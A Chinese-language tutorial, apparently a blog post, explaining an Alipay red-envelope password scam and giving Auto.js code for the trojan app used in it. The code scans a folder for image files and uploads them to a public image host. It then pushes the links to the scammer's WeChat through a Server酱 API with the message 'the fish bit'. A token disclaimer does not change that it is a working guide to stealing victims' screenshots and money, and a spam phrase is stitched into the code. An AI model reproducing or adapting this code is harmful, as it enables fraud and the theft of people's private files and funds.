盗刷⽀付宝⼝令新(讲解与制作)
盗取⽀付宝⼝令红包,本⽂详细解释原理与制作过程
不要⽤于⾮法⽤途,推送接⼝,图床访问⽇志,⽀付宝收款等都可以到你,⽹络不是法外之地
原理
骗⼦会让你发⼀个⽀付宝⼝令红包,说是来证明你有钱,等交易完成之后你再把⼝令给他,等你发了红包,这时候看似正常⽽⼜良⼼的商家会给你发⼀个软件,软件可能是某某游戏外挂,suo机⽣成器,甚⾄是⾊情软件,等你打开软件的那⼀刻,骗⼦也会收到⼀条名为“鱼咬勾了”的信息,你的⼝令就在那⾥⾯。
⼤佬看到这⾥就可以退出了,全⽂没有什么技术难点
思路
思路很简单,接下来⼀步⼀步实现
开始制作
语⾔选⽤autojs,⽤这个写简单
遍历指定⽬录
代码实现:
function getFilesFromPath(path) {
/*格式:getFilesFromPath(⽂件夹路径)*/
/*解释:获取⽂件夹所有⽂件和⽂件夹递归遍历返回⽂件路径数组*/
var arrDir = new Array();
var arrFile = new Array();
try {
var rp = /^([/][^\/:*?<>|]+[/]?)+$/;
if (rp.test(path) == false) throw "⾮法⽂件路径,H.getFilesFromPath(?);" + path;
} catch (err) {
log(err);
exit();
}
/*获取path⽬录下所有⽂件夹和⽂件*/
var arr = files.listDir(path);
/*遍历⽂件和⽂件夹*/
for (var i = 0; i < arr.length; i++) {
/*连接路径*/
newPath = files.join(path, arr[i]);
/*判断路径类型*/
支付宝商家收款码怎么弄if (files.isDir(newPath)) {
//arrDir.push(newPath);
/*递归遍历⽂件夹*/
//var arrF = getFilesFromPath(newPath);
//arrDir = at(arrF);
//注释这⼏⾏是递归遍历所有⽂件的,这⾥不需要,所以注释
} else if (files.isFile(newPath)) {
arrFile.push(newPath);
}
}
/*按字母升序排序数组*/
arrDir.sort();
arrFile.sort();
/*连接数组并返回*/
at(arrFile);
}
正则筛选图⽚
这个其实是可以写⼊到上⼀个函数⾥⾯的,但是,⼀个函数⼀个功能,不能混,不然过⼏天我就看不懂⾃⼰的代码了
代码实现:
function imgPatt(arrdizhi){
var imgarr=[]
for(j=0;j<arrdizhi.length;j++){//遍历所有的⽂件
if(arrdizhi[j].search(/^.*?[.](bmp|jpg|gif|jpeg)/i)==false){//判断是否是图⽚,如果是就写⼊到数组中
imgarr[imgarr.length]=arrdizhi[j];
}
}
return imgarr;
}
上传图床
这⼀步其实是可以上传到⾃⼰服务器的,但是考虑到安全性,还是上传到图床⽐较稳
代码实现(上传):
function upImg(path) {
var url = "pic.sogou/pic/upload_pic.jsp";
var res = http.postMultipart(url, {
"file": open(path),
});
return res.body.string();
}
由于上传的不是⼀张图⽚,所以还得写个循环:
function arrUp(arrimg){
var arrurl_f=[]
for(i=0;i<arrimg.length;i++){
arrurl_f[arrurl_f.length]=upImg(arrimg[i])
}
return arrurl_f;
}
推送到
这⾥⽤的是Server酱的接⼝,⽤别的接⼝⾃⼰写吧(注意,我这⾥是把结果弄成md的形式上传的,这样收到的就可以直接看到,不需要再转到浏览器了)代码实现:
function weChat(arrstr){
var md;
for(i=0;i<arrstr.length;i++){
md+="![]("+arrstr[i]+")\n";
}
var api="sc.ftqq/xxxxxxxxxxxxxxxxxxxxxxxx.send?text=鱼咬勾了&desp=";
var json_api = (api+md).body.json();
return json_api;
}
⾄此,核⼼代码就已经写完了,往下我也不写了,再写就是帮助你犯罪了
发布评论